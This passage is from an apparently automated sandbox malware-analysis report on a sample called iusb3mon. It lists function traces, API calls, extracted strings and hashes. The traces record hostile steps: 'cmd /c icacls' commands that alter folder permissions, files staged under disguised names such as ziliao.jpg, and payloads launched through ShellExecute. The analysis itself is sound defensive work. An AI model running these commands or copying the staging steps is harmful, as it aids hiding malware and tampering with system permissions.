                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressLibraryProc$Load$Free$CloseExitHandleWindows
                                                                                                                    • String ID: SeShutdownPrivilege
                                                                                                                    • API String ID: 3789203340-3733053543
                                                                                                                    • Opcode ID: a6c288a1d41e9072f1e958e2eb99cb427b04676ed09422708c451a44e2c605ed
                                                                                                                    • Instruction ID: 2c14110711d10cc6694b0dc52f9fe710b9297902edc5d0e679ac1fbf5ec348b7
                                                                                                                    • Opcode Fuzzy Hash: a6c288a1d41e9072f1e958e2eb99cb427b04676ed09422708c451a44e2c605ed
                                                                                                                    • Instruction Fuzzy Hash: 15D0C93217EBA03DF59932147C0BF8953868B01720F21041BFA25680C05F9668D1069D
                                                                                                                    Function 04D100CD Relevance: 2.6, Strings: 2, Instructions: 87COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577257538.0000000004D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_4d10000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: l$ntdl
                                                                                                                    • API String ID: 0-924918826
                                                                                                                    • Opcode ID: c362b51c53e3eeabca090c6237b61e6bcf708d1a3817c6eecd03a2daff8ddda5
                                                                                                                    • Instruction ID: 27e786951bdf8b67bfbaddc8d077004d8ea0a8859ef3f3fbac939b106c281c3f
                                                                                                                    • Opcode Fuzzy Hash: c362b51c53e3eeabca090c6237b61e6bcf708d1a3817c6eecd03a2daff8ddda5
                                                                                                                    • Instruction Fuzzy Hash: 562133B1B00120AFDF1AAF54949862F7BE2FF447547218099D805CF768EB35E981C7D0
                                                                                                                    Function 001E817A Relevance: .0, Instructions: 22COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4571601291.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4571337549.00000000001D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4571918062.00000000001EE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572153673.00000000001FC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572420177.00000000001FE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572664793.0000000000203000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572895265.0000000000204000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000206000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026E000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000270000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000274000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000276000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000278000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000027A000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028A000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000293000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000295000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000297000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000299000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029B000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029E000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A1000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A5000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002AA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B2000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002BA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C6000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C8000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002ED000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4575400315.000000000058A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_1d0000_iusb3mon.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 4752ed74c6e0d5fc0635c5e9ee1919fb5ee4d4faf056dc546268fc3d4a948d2d
                                                                                                                    • Instruction ID: b958b88a9727af30eee3be6302b5e940da44b9f56b738f9988b426b64e09ae14
                                                                                                                    • Opcode Fuzzy Hash: 4752ed74c6e0d5fc0635c5e9ee1919fb5ee4d4faf056dc546268fc3d4a948d2d
                                                                                                                    • Instruction Fuzzy Hash: CAE046329116A8EBCB14DB99C904D8AF2ECEB44B41B110096B505E3210C670DE01C7D0
                                                                                                                    Function 001DDB1C Relevance: .0, Instructions: 12COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4571601291.00000000001D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4571337549.00000000001D0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4571918062.00000000001EE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572153673.00000000001FC000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572420177.00000000001FE000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572664793.0000000000203000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4572895265.0000000000204000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000206000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000026E000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000270000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000274000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000276000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000278000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000027A000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028A000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000028C000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000293000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000295000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000297000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.0000000000299000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029B000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.000000000029E000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A1000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002A5000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002AA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002B2000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002BA000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C0000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C6000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002C8000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4573068486.00000000002ED000.00000040.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4575400315.000000000058A000.00000020.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_1d0000_iusb3mon.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 694cbe831bc19fd0730d4c407680a11a69efbe1f69b7222d89b60d0701cb05dc
                                                                                                                    • Instruction ID: 6549d09c47c5f1f1523cabb2a3d3eae127fa4d7ed8b0d4a4eeada5144e59da21
                                                                                                                    • Opcode Fuzzy Hash: 694cbe831bc19fd0730d4c407680a11a69efbe1f69b7222d89b60d0701cb05dc
                                                                                                                    • Instruction Fuzzy Hash: 3DC08C74040D408ACE299A10D2F13A83354A3A3786FC0068EC8070B746CF1EAC83EF00
                                                                                                                    Function 06242772 Relevance: 78.9, APIs: 16, Strings: 29, Instructions: 173filesleeplibraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 06242A15: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,c:\inst.ini,?,?,06242661,c:\inst.ini), ref: 06242A2B
                                                                                                                      • Part of subcall function 06242A15: WriteFile.KERNEL32(00000000,C:\\rar.exe,0000000B,?,00000000,?,06242661,c:\inst.ini), ref: 06242A40
                                                                                                                      • Part of subcall function 06242A15: CloseHandle.KERNEL32(00000000,?,06242661,c:\inst.ini), ref: 06242A4D
                                                                                                                      • Part of subcall function 06241C74: SetFileAttributesA.KERNEL32(00000000,00000080,0624682E,C:\ProgramData\Microsoft\Program\ziliao.jpg,00000000), ref: 06241C88
                                                                                                                    • Sleep.KERNEL32(000003E8,?,?,00000000,?,?), ref: 062427B0
                                                                                                                    • DeleteFileA.KERNEL32(C:\ProgramData\upx.rar,?,?,00000000,?,?), ref: 062427B9
                                                                                                                    • DeleteFileA.KERNEL32(C:\ProgramData\Data\upx.rar,?,?,00000000,?,?), ref: 062427BC
                                                                                                                    • Sleep.KERNEL32(000003E8,?,?,00000000,?,?), ref: 062427C3
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,00000000,?,?), ref: 062427D3
                                                                                                                    • LoadLibraryA.KERNEL32(0000004B,?,?,?,00000000,?,?), ref: 06242849
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 06242850
                                                                                                                    • GetTickCount.KERNEL32 ref: 0624289E
                                                                                                                    • GetTickCount.KERNEL32 ref: 062428D9
                                                                                                                    • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?), ref: 06242901
                                                                                                                    • CreateFileA.KERNEL32(C:\ProgramData\data\upx.rar,40000000,00000002,00000000,00000002,00000080,00000000,?,?,?,?,?,?,00000000,?,?), ref: 0624291E
                                                                                                                    • WriteFile.KERNEL32(00000025,?,Ru%d%s,?,00000000,?,?,?,?,?,?,00000000,?,?), ref: 06242956
                                                                                                                    • CloseHandle.KERNEL32(00000025,?,?,?,?,?,?,00000000,?,?), ref: 0624295F
                                                                                                                    • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,00000000,?,?), ref: 0624296A
                                                                                                                    • DeleteFileA.KERNEL32(c:\tzfz,?,?,?,?,?,?,00000000,?,?), ref: 0624297B
                                                                                                                    • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,00000000,?,?), ref: 0624299E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$DeleteSleep$AttributesCloseCountCreateHandleTickWrite$AddressLibraryLoadModuleNameProclstrcat
                                                                                                                    • String ID: .$.dll$.dll$A$C:\ProgramData\Data\upx.rar$C:\ProgramData\data\upx.rar$C:\ProgramData\upx.rar$E$G$K$KERNEL32.dll$N$P$Plugin32.dll$R$Ru%d%s$T$a$c:\tzfz$d$e$e$h$l$l$m$p$t$t
                                                                                                                    • API String ID: 3823570417-2945788138
                                                                                                                    • Opcode ID: de5888895639fbf4e1ccad89d7c1ec839dfa0752867169abd8912ea170504bbc
                                                                                                                    • Instruction ID: f34b754ebc5dfd7242c156841cd4fb923b20fcb4402f7724b833f7c1c132e6c7
                                                                                                                    • Opcode Fuzzy Hash: de5888895639fbf4e1ccad89d7c1ec839dfa0752867169abd8912ea170504bbc
                                                                                                                    • Instruction Fuzzy Hash: 047193219083C9EEEB11D7A8DC4DBDE7FA95F15304F044189E6946A1C2CBBA4748CB76
                                                                                                                    Function 0624274E Relevance: 77.2, APIs: 15, Strings: 29, Instructions: 173filesleeplibraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 06242A15: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,c:\inst.ini,?,?,06242661,c:\inst.ini), ref: 06242A2B
                                                                                                                      • Part of subcall function 06242A15: WriteFile.KERNEL32(00000000,C:\\rar.exe,0000000B,?,00000000,?,06242661,c:\inst.ini), ref: 06242A40
                                                                                                                      • Part of subcall function 06242A15: CloseHandle.KERNEL32(00000000,?,06242661,c:\inst.ini), ref: 06242A4D
                                                                                                                      • Part of subcall function 06241C74: SetFileAttributesA.KERNEL32(00000000,00000080,0624682E,C:\ProgramData\Microsoft\Program\ziliao.jpg,00000000), ref: 06241C88
                                                                                                                    • Sleep.KERNEL32(000003E8,?,?,00000000,?,?), ref: 062427B0
                                                                                                                    • DeleteFileA.KERNEL32(C:\ProgramData\upx.rar,?,?,00000000,?,?), ref: 062427B9
                                                                                                                    • DeleteFileA.KERNEL32(C:\ProgramData\Data\upx.rar,?,?,00000000,?,?), ref: 062427BC
                                                                                                                    • Sleep.KERNEL32(000003E8,?,?,00000000,?,?), ref: 062427C3
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,00000000,?,?), ref: 062427D3
                                                                                                                    • LoadLibraryA.KERNEL32(0000004B,?,?,?,00000000,?,?), ref: 06242849
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 06242850
                                                                                                                    • GetTickCount.KERNEL32 ref: 0624289E
                                                                                                                    • GetTickCount.KERNEL32 ref: 062428D9
                                                                                                                    • lstrcatA.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?), ref: 06242901
                                                                                                                    • CreateFileA.KERNEL32(C:\ProgramData\data\upx.rar,40000000,00000002,00000000,00000002,00000080,00000000,?,?,?,?,?,?,00000000,?,?), ref: 0624291E
                                                                                                                    • WriteFile.KERNEL32(00000025,?,Ru%d%s,?,00000000,?,?,?,?,?,?,00000000,?,?), ref: 06242956
                                                                                                                    • CloseHandle.KERNEL32(00000025,?,?,?,?,?,?,00000000,?,?), ref: 0624295F
                                                                                                                    • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,00000000,?,?), ref: 0624296A
                                                                                                                    • DeleteFileA.KERNEL32(c:\tzfz,?,?,?,?,?,?,00000000,?,?), ref: 0624297B
                                                                                                                    • GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?,00000000,?,?), ref: 0624299E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$DeleteSleep$AttributesCloseCountCreateHandleTickWrite$AddressLibraryLoadModuleNameProclstrcat
                                                                                                                    • String ID: .$.dll$.dll$A$C:\ProgramData\Data\upx.rar$C:\ProgramData\data\upx.rar$C:\ProgramData\upx.rar$E$G$K$KERNEL32.dll$N$P$Plugin32.dll$R$Ru%d%s$T$a$c:\tzfz$d$e$e$h$l$l$m$p$t$t
                                                                                                                    • API String ID: 3823570417-2945788138
                                                                                                                    • Opcode ID: d08cfa0cf5aaf5934548075787ca7757dfba62a1e9d265cab53e1b2a18361d78
                                                                                                                    • Instruction ID: 35dda4861ac55537888ad5c663e6d809befe35cd776549c203824ef74451166f
                                                                                                                    • Opcode Fuzzy Hash: d08cfa0cf5aaf5934548075787ca7757dfba62a1e9d265cab53e1b2a18361d78
                                                                                                                    • Instruction Fuzzy Hash: 9561A1308083C9EEEB12D7A8DC4DBDE7F655F16304F044189E694AA1C2C7BA4648CB76
                                                                                                                    Function 06241C8F Relevance: 73.7, APIs: 21, Strings: 21, Instructions: 200filesleeplibraryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • WinExec.KERNEL32(cmd /c icacls "C:\ProgramData\Microsoft\Program" /remove:d Everyone",00000000), ref: 06241CA3
                                                                                                                      • Part of subcall function 06241C74: SetFileAttributesA.KERNEL32(00000000,00000080,0624682E,C:\ProgramData\Microsoft\Program\ziliao.jpg,00000000), ref: 06241C88
                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 06241CDF
                                                                                                                    • DeleteFileA.KERNEL32(C:\ProgramData\Microsoft\Program\ziliao.jpg1), ref: 06241CEC
                                                                                                                    • DeleteFileA.KERNEL32(C:\ProgramData\Microsoft\Program\ziliao.jpg), ref: 06241CEF
                                                                                                                    • DeleteFileA.KERNEL32(C:\ProgramData\Microsoft\Program\ziliao), ref: 06241CF6
                                                                                                                    • DeleteFileA.KERNEL32(C:\ProgramData\Microsoft\ziliao.jpg), ref: 06241CFD
                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 06241D04
                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 06241D18
                                                                                                                    • LoadLibraryA.KERNEL32(0000004B,?), ref: 06241D8C
                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 06241D93
                                                                                                                    • GetTickCount.KERNEL32 ref: 06241DDF
                                                                                                                    • GetTickCount.KERNEL32 ref: 06241E17
                                                                                                                    • lstrcatA.KERNEL32(?,?), ref: 06241E3F
                                                                                                                    • CreateFileA.KERNEL32(C:\ProgramData\Microsoft\Program\ziliao.jpg,40000000,00000002,00000000,00000002,00000080,00000000), ref: 06241E56
                                                                                                                    • WriteFile.KERNEL32(00000025,?,Ru%d%s,?,00000000), ref: 06241E8A
                                                                                                                    • CloseHandle.KERNEL32(00000025), ref: 06241E93
                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 06241E9E
                                                                                                                    • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 06241ECA
                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 06241ED7
                                                                                                                    • ExitProcess.KERNEL32 ref: 06241EDE
                                                                                                                    • GetFileAttributesA.KERNEL32(?), ref: 06241F05
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Delete$Sleep$AttributesCountProcessTick$AddressCloseCreateExecExecuteExitHandleLibraryLoadModuleNameProcShellTerminateWritelstrcat
                                                                                                                    • String ID: A$C:\ProgramData\Microsoft\Program\ziliao$C:\ProgramData\Microsoft\Program\ziliao.jpg$C:\ProgramData\Microsoft\Program\ziliao.jpg1$C:\ProgramData\Microsoft\ziliao.jpg$G$KERNEL32.dll$P$Plugin32.dll$Ru%d%s$T$a$cmd /c icacls "C:\ProgramData\Microsoft\Program" /remove:d Everyone"$e$e$h$m$open$p$t$t
                                                                                                                    • API String ID: 1333362825-3008771302
                                                                                                                    • Opcode ID: bac64167e9fcbf614c98aa0c79c532539cf02f10b7bf8ef0cc5db3e00340f955
                                                                                                                    • Instruction ID: 89468e8136631141c948c877c90f5e9231987956d46e8fffe2ee541fe2afd60c
                                                                                                                    • Opcode Fuzzy Hash: bac64167e9fcbf614c98aa0c79c532539cf02f10b7bf8ef0cc5db3e00340f955
                                                                                                                    • Instruction Fuzzy Hash: C78194618043C9EEEB51A7B4DC4CBEE7FBD5F16308F044189E694A6181C7BA4B48CB76
                                                                                                                    Function 0624739A Relevance: 60.1, APIs: 1, Strings: 39, Instructions: 79COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • wsprintfA.USER32 ref: 06247480
                                                                                                                      • Part of subcall function 062491B3: LoadLibraryA.KERNEL32(ADVAPI32.dll,?,?,?,?,?,?,00000000,00000000,00000000), ref: 06249216
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(00000000,RegQueryValueExA), ref: 0624922E
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegOpenKeyExA), ref: 0624923E
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegEnumValueA), ref: 0624924E
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegEnumKeyExA), ref: 0624925B
                                                                                                                      • Part of subcall function 062491B3: GetProcAddress.KERNEL32(?,RegCloseKey), ref: 06249268
                                                                                                                      • Part of subcall function 062491B3: FreeLibrary.KERNEL32(?,?,?,?,?,?,?,00000000,00000000,00000000), ref: 062493F3
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000001C.00000002.4577401759.0000000006240000.00000040.00001000.00020000.00000000.sdmp, Offset: 06240000, based on PE: true
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006271000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006273000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006276000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.0000000006278000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000001C.00000002.4577401759.000000000627A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_28_2_6240000_iusb3mon.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$Library$FreeLoadwsprintf
                                                                                                                    • String ID: %$C$C$Console$E$M$S$S$S$S$T$Y$\$\$\$c$e$e$e$e$i$l$lSet\Services\%s$lSet\Services\%s$n$n$o$o$r$r$r$r$s$s$t$t$t$u$v
                                                                                                                    • API String ID: 1476185493-1609218977
                                                                                                                    • Opcode ID: b2a0cfa0bc9760ecafb11f0b2ae8b775336efe99f4feddf052ae6567aad96077
                                                                                                                    • Instruction ID: 98f023ac9f2fdcfc181b17f8b3a98ae3608a13cf3a6fb86261f9db10d39fb6fc
                                                                                                                    • Opcode Fuzzy Hash: b2a0cfa0bc9760ecafb11f0b2ae8b775336efe99f4feddf052ae6567aad96077
                                                                                                                    • Instruction Fuzzy Hash: 5131DF50D0C6C9DDEB02D6A888487DFBFB55B26249F0840D8D6943A282C6FF575887BA
                                                                                                                    Function 06243DF2 Relevance: 56.1, APIs: 24, Strings: 8, Instructions: 142threadprocesssleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • WinExec.KERNEL32(cmd /c icacls "C:\ProgramData\Program" /remove:d Everyone",00000000), ref: 06243E0C
                                                                                                                    • WinExec.KERNEL32(cmd /c icacls "C:\ProgramData\Microsoft\Program" /remove:d Everyone",00000000), ref: 06243E14
